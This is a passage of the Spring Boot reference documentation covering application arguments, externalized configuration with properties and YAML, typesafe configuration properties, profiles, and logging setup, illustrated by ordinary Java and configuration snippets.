\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using\n`SpringApplication` within a JUnit test.\n\n\n\n[[boot-features-application-arguments]]\n=== Accessing application arguments\nIf you need to access the application arguments that were passed to\n`SpringApplication.run(...)` you can inject an\n`org.springframework.boot.ApplicationArguments` bean. The `ApplicationArguments` interface\nprovides access to both the raw `String[]` arguments as well as parsed `option` and\n`non-option` arguments:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.beans.factory.annotation.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Autowired\n\t\tpublic MyBean(ApplicationArguments args) {\n\t\t\tboolean debug = args.containsOption(\"debug\");\n\t\t\tList<String> files = args.getNonOptionArgs();\n\t\t\t\/\/ if run with \"--debug logfile.txt\" debug=true, files=[\"logfile.txt\"]\n\t\t}\n\n\t}\n----\n\nTIP: Spring Boot will also register a `CommandLinePropertySource` with the Spring\n`Environment`. This allows you to also inject single application arguments using the\n`@Value` annotation.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the ApplicationRunner or CommandLineRunner\nIf you need to run some specific code once the `SpringApplication` has started, you can\nimplement the `ApplicationRunner` or `CommandLineRunner` interfaces. Both interfaces work\nin the same way and offer a single `run` method which will be called just before\n`SpringApplication.run(...)` completes.\n\nThe `CommandLineRunner` interface provides access to application arguments as a simple\nstring array, whereas the `ApplicationRunner` uses the `ApplicationArguments` interface\ndiscussed above.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner` or\n`ApplicationRunner` beans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-application-admin]]\n=== Admin features\nIt is possible to enable admin-related features for the application by specifying the\n`spring.application.admin.enabled` property. This exposes the\n{sc-spring-boot}\/admin\/SpringApplicationAdminMXBean.{sc-ext}[`SpringApplicationAdminMXBean`]\non the platform `MBeanServer`. You could use this feature to administer your Spring Boot\napplication remotely. This could also be useful for any service wrapper implementation.
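\n\nFor example, the feature could be switched on from `application.properties` (a minimal sketch; the property is not enabled by default):\n\n[source,properties,indent=0]\n----\n\tspring.application.admin.enabled=true\n----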
\n\nTIP: If you want to know on which HTTP port the application is running, get the property\nwith key `local.server.port`.\n\nNOTE: Take care when enabling this feature as the MBean exposes a method to shut down the\napplication.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or\n<<boot-features-external-config-typesafe-configuration-properties,bound to structured objects>>\nvia `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values. Properties are considered in the following order:\n\n. Command line arguments.\n. JNDI attributes from `java:comp\/env`.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> outside of your packaged jar\n (`application-{profile}.properties` and YAML variants)\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> packaged inside your jar (`application-{profile}.properties`\n and YAML variants)\n. Application properties outside of your packaged jar (`application.properties` and YAML\n variants).\n. Application properties packaged inside your jar (`application.properties` and YAML\n variants).\n. {spring-javadoc}\/context\/annotation\/PropertySource.{dc-ext}[`@PropertySource`] annotations\n on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*;\n\timport org.springframework.beans.factory.annotation.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Value(\"${name}\")\n\t\tprivate String name;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\n\n\n[[boot-features-external-config-random-values]]\n=== Configuring random values\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).
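\n\nAs an illustration, one of the keys above could then be injected into a bean (a sketch that assumes the `my.number.in.range` entry shown above; the bean and field names are arbitrary):\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyRandomBean {\n\n\t\t\/\/ resolved once at startup from the RandomValuePropertySource\n\t\t@Value(\"${my.number.in.range}\")\n\t\tprivate int randomPort;\n\n\t}\n----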
\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory.\n. A classpath `\/config` package.\n. The classpath root.\n\nThe list is ordered by precedence (properties defined in locations higher in the list\noverride those defined in lower locations).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile-specific properties\nIn addition to `application.properties` files, profile-specific properties can also be\ndefined using the naming convention `application-{profile}.properties`. The\n`Environment` has a set of default profiles (by default `[default]`) which are\nused if no active profiles are set (i.e. 
if no profiles are explicitly activated\nthen properties from `application-default.properties` are loaded).\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files always overriding the non-specific\nones irrespective of whether the profile-specific files are inside or outside your\npackaged jar.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the _<<howto.adoc#howto-use-short-command-line-arguments>>_ how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/www.snakeyaml.org\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` will load YAML as `Properties` and the\n`YamlMapFactoryBean` will load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\tmy:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholder syntax to access YAML properties.
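\n\nFor example, with the `environments` YAML document shown earlier loaded into the `Environment`, a bean could read one of the values like this (a sketch):\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class EnvironmentUrls {\n\n\t\t\/\/ resolves to http:\/\/dev.bar.com from the YAML example above\n\t\t@Value(\"${environments.dev.url}\")\n\t\tprivate String devUrl;\n\n\t}\n----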
\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\nThe default profiles are activated if none are explicitly active when the application\ncontext starts. So in this YAML we set a value for `security.user.password` that is\n*only* available in the \"default\" profile:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 8000\n\t---\n\tspring:\n\t profiles: default\n\tsecurity:\n\t user:\n\t password: weak\n----\n\nwhereas in this example, the password is always set because it isn't attached to any\nprofile, and it would have to be explicitly reset in all other profiles as necessary:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 8000\n\tsecurity:\n\t user:\n\t password: weak\n----\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nNOTE: The getters and setters are advisable, since binding is via standard Java Beans\nproperty descriptors, just like in Spring MVC. They are mandatory for immutable types or\nthose that are directly coercible from `String`. As long as they are initialized, maps,\ncollections, and arrays need a getter but not necessarily a setter since they can be\nmutated by the binder. If there is a setter, Maps, collections, and arrays can be created.\nMaps and collections can be expanded with only a getter, whereas arrays require a setter.\nNested POJO properties can also be created (so a setter is not mandatory) if they have a\ndefault constructor, or a constructor accepting a single value that can be coerced from\nString. Some people use Project Lombok to add getters and setters automatically.\n\nThe `@EnableConfigurationProperties` annotation is automatically applied to your project\nso that any beans annotated with `@ConfigurationProperties` will be configured from the\n`Environment` properties. 
This style of configuration works particularly well with the\n`SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t\t\/\/ ...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\nTIP: Using `@ConfigurationProperties` also allows you to generate meta-data files that can\nbe used by IDEs. See the <<configuration-metadata>> appendix for details.\n\n\n\n[[boot-features-external-config-3rd-party-configuration]]\n==== Third-party configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it\non `@Bean` methods. This can be particularly useful when you want to bind properties to\nthird-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to\nits bean registration:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix = \"foo\")\n\t@Bean\n\tpublic FooComponent fooComponent() {\n\t\t...\n\t}\n----\n\nAny property defined with the `foo` prefix will be mapped onto that `FooComponent` bean\nin a similar manner as the `ConnectionSettings` example above.\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include dash-separated (e.g. `context-path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nFor example, given the following `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"person\")\n\tpublic class PersonSettings {\n\n\t\tprivate String firstName;\n\n\t\tpublic String getFirstName() {\n\t\t\treturn this.firstName;\n\t\t}\n\n\t\tpublic void setFirstName(String firstName) {\n\t\t\tthis.firstName = firstName;\n\t\t}\n\n\t}\n----\n\nThe following property names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n|`person.firstName`\n|Standard camel case syntax.\n\n|`person.first-name`\n|Dashed notation, recommended for use in `.properties` and `.yml` files.\n\n|`PERSON_FIRST_NAME`\n|Upper case format. Recommended when using system environment variables.\n|===\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean) or custom `Converters` (with\nbean definitions annotated as `@ConfigurationPropertiesBinding`).
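\n\nFor example, a converter for a hypothetical `PersonName` value type might look like this (a sketch, not part of Spring Boot itself):\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.properties.ConfigurationPropertiesBinding;\n\timport org.springframework.core.convert.converter.Converter;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\t@ConfigurationPropertiesBinding\n\tpublic class PersonNameConverter implements Converter<String, PersonName> {\n\n\t\t@Override\n\t\tpublic PersonName convert(String source) {\n\t\t\t\/\/ split a \"FirstName LastName\" property value into its two parts\n\t\t\tString[] parts = source.split(\" \", 2);\n\t\t\treturn new PersonName(parts[0], parts[1]);\n\t\t}\n\n\t}\n----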
\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to\nlimit the dependencies your `ConversionService` is using. Typically, any dependency that\nyou'd require may not be fully initialized at creation time. You may want to rename your\ncustom `ConversionService` if it's not required for coercing configuration keys.\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nIn order to validate values of nested properties, you must annotate the associated field\nas `@Valid` to trigger its validation. For example, building upon the above\n`ConnectionSettings` example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\t@Valid\n\t\tprivate RemoteAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t\tprivate static class RemoteAddress {\n\n\t\t\t@NotEmpty\n\t\t\tpublic String hostname;\n\n\t\t\t\/\/ ... getters and setters\n\n\t\t}\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`. There is a\n{github-code}\/spring-boot-samples\/spring-boot-sample-property-validation[Validation sample]\nso you can see how to set things up.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n_<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>_\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties: the highest `PropertySource` wins. 
This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with the following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee _<<boot-features-external-config-profile-specific-properties>>_ for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J], http:\/\/logging.apache.org\/log4j\/2.x\/[Log4J2] and\nhttp:\/\/logback.qos.ch\/[Logback]. In each case loggers are pre-configured to use console\noutput with optional file output also available.\n\nBy default, if you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing. 
Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Thread name -- Enclosed in square brackets (may be truncated for console output).\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\nNOTE: Logback does not have a `FATAL` level (it is mapped to `ERROR`).\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nNOTE: You can also specify `debug=true` in your `application.properties`.\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, Spring Boot will only log to the console and will not write log files. If you\nwant to write log files in addition to the console output you need to set a\n`logging.file` or `logging.path` property (for example in your `application.properties`).\n\nThe following table shows how the `logging.*` properties can be used together:\n\n.Logging properties\n[cols=\"1,1,1,4\"]\n|===\n|`logging.file` |`logging.path` |Example |Description\n|_(none)_\n|_(none)_\n|\n|Console only logging.\n\n|Specific file\n|_(none)_\n|`my.log`\n|Writes to the specified log file. Names can be an exact location or relative to the\ncurrent directory.\n\n|_(none)_\n|Specific directory\n|`\/var\/log`\n|Writes `spring.log` to the specified directory. 
Names can be an exact location or\nrelative to the current directory.\n|===\n\nLog files will rotate when they reach 10 MB and, as with console output, `ERROR`, `WARN`\nand `INFO` level messages are logged by default.\n\nNOTE: The logging system is initialized early in the application lifecycle and as such\nlogging properties will not be found in property files loaded via `@PropertySource`\nannotations.\n\n\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using\n'`+logging.level.*=LEVEL+`' where '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR,\nFATAL, OFF. Example `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nNOTE: By default Spring Boot remaps Thymeleaf `INFO` messages so that they are logged at\n`DEBUG` level. This helps to reduce noise in the standard log output. See\n{sc-spring-boot}\/logging\/logback\/LevelRemappingAppender.{sc-ext}[`LevelRemappingAppender`]\nfor details of how you can apply remapping in your own configuration.\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`.\n\nNOTE: Since logging is initialized *before* the `ApplicationContext` is created, it isn't\npossible to control logging from `@PropertySources` in Spring `@Configuration` files.\nSystem properties and the conventional Spring Boot external configuration files work just\nfine.\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback-spring.xml`, `logback-spring.groovy`, `logback.xml` or `logback.groovy`\n\n|Log4j\n|`log4j-spring.properties`, `log4j-spring.xml`, `log4j.properties` or `log4j.xml`\n\n|Log4j2\n|`log4j2-spring.xml` or `log4j2.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nNOTE: When possible we recommend that you use the `-spring` variants for your logging\nconfiguration (for example `logback-spring.xml` rather than `logback.xml`). If you use\nstandard configuration locations, Spring cannot completely control log initialization.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.exception-conversion-word`\n|`LOG_EXCEPTION_CONVERSION_WORD`\n|The conversion word that's used when logging exceptions.\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`logging.pattern.console`\n|`CONSOLE_LOG_PATTERN`\n|The log pattern to use on the console (stdout). (Not supported with JDK logger.)\n\n|`logging.pattern.file`\n|`FILE_LOG_PATTERN`\n|The log pattern to use in a file (if LOG_FILE enabled). 
(Not supported with JDK logger.)\n\n|`logging.pattern.level`\n|`LOG_LEVEL_PATTERN`\n|The format to use to render the log level (default `%5p`). (The `logging.pattern.level` form is only supported by Logback.)\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\n[TIP]\n====\n\nYou can add MDC and other ad-hoc content to log lines by overriding\nonly the `LOG_LEVEL_PATTERN` (or `logging.pattern.level` with\nLogback). For example, if you use `logging.pattern.level=user:%X{user}\n%5p` then the default log format will contain an MDC entry for \"user\"\nif it exists, e.g.\n\n----\n2015-09-30 12:30:04.031 user:juergen INFO 22174 --- [ nio-8080-exec-0] demo.Controller Handling authenticated request\n----\n====\n\n\n\n[[boot-features-logback-extensions]]\n=== Logback extensions\nSpring Boot includes a number of extensions to Logback which can help with advanced\nconfiguration. You can use these extensions in your `logback-spring.xml` configuration\nfile.\n\nNOTE: You cannot use extensions in the standard `logback.xml` configuration file since\nit's loaded too early. You need to either use `logback-spring.xml` or define a\n`logging.config` property.\n\n\n\n==== Profile specific configuration\nThe `<springProfile>` tag allows you to optionally include or exclude sections of\nconfiguration based on the active Spring profiles. Profile sections are supported anywhere\nwithin the `<configuration>` element. Use the `name` attribute to specify which profile\naccepts the configuration. Multiple profiles can be specified using a comma-separated\nlist.\n\n[source,xml,indent=0]\n----\n\t<springProfile name=\"staging\">\n\t\t<!-- configuration to be enabled when the \"staging\" profile is active -->\n\t<\/springProfile>\n\n\t<springProfile name=\"dev, staging\">\n\t\t<!-- configuration to be enabled when the \"dev\" or \"staging\" profiles are active -->\n\t<\/springProfile>\n\n\t<springProfile 